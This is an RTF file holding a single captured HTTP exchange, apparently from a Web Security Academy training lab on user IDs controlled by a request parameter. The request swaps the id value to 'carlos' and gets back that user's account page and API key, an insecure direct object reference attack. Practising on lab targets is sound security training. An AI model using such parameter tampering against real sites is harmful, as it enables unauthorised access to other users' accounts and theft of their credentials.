{\rtf1\ansi\ansicpg1252\cocoartf2709
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 GET /my-account?id=carlos HTTP/2\
Host: 0a44009103ec7ecb82b68383008600b3.web-security-academy.net\
Cookie: session=Sx3PGlDYEGUGeVkgdHQIG1Oo7zt6q67j\
\
\
HTTP/2 200 OK\
Content-Type: text/html; charset=utf-8\
Cache-Control: no-cache\
X-Frame-Options: SAMEORIGIN\
Content-Length: 3565\
\
<!DOCTYPE html>\
<html>\
    <head>\
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>\
        <link href=/resources/css/labs.css rel=stylesheet>\
        <title>User ID controlled by request parameter\
\'85\
\
                   <div id=account-content>\
                        <p>Your username is: carlos</p>\
                        <div>Your API Key is: jI4GnNpMNZUZJQaJBfUZVYAUcGE2bE5R</div><br/>\
}